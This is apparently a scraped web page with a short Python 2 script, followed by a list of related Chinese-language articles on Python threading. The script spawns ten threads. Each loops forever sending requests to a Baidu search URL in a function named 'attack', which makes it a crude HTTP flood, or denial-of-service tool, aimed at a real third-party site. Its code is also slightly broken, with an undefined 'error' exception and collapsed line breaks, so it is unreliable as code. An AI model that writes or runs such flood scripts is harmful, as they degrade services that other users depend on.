import urllib
import socket
from threading import * url = "http://www.baidu.com/s?ie=UTF-8&wd=tofind.space"
cishu = 0
socket.setdefaulttimeout(15) def gethtml():
global cishu
cishu += 1
print cishu
urllib.urlopen(url).read() def attack():
while True:
try:
gethtml()
except error:
pass def run():
t = Thread(target=attack)
t.start() for i in range(10):
run()
相关文章
- 01-09python2 logging模块在多进程和多线程混用下的一个坑
- 01-09第7.26节 Python中的@property装饰器定义属性访问方法getter、setter、deleter 详解
- 01-09python基础之多线程的操作
- 01-09python-永久编程访问我自己的Google日历
- 01-09如何从另一个对象的方法访问对象的属性,这是Python中的一个属性?
- 01-09如何从Python装饰器内部访问装饰方法的局部变量(locals())?
- 01-09python – 使用Pyramid进行基于角色的访问控制
- 01-09Python编写基于socket的非阻塞多人聊天室程序(单线程&多线程)
- 01-09Python并发编程04 /多线程、生产消费者模型、线程进程对比、线程的方法、线程join、守护线程、线程互斥锁
- 01-09如何在Python中多线程/多处理一个特定函数的一个实例?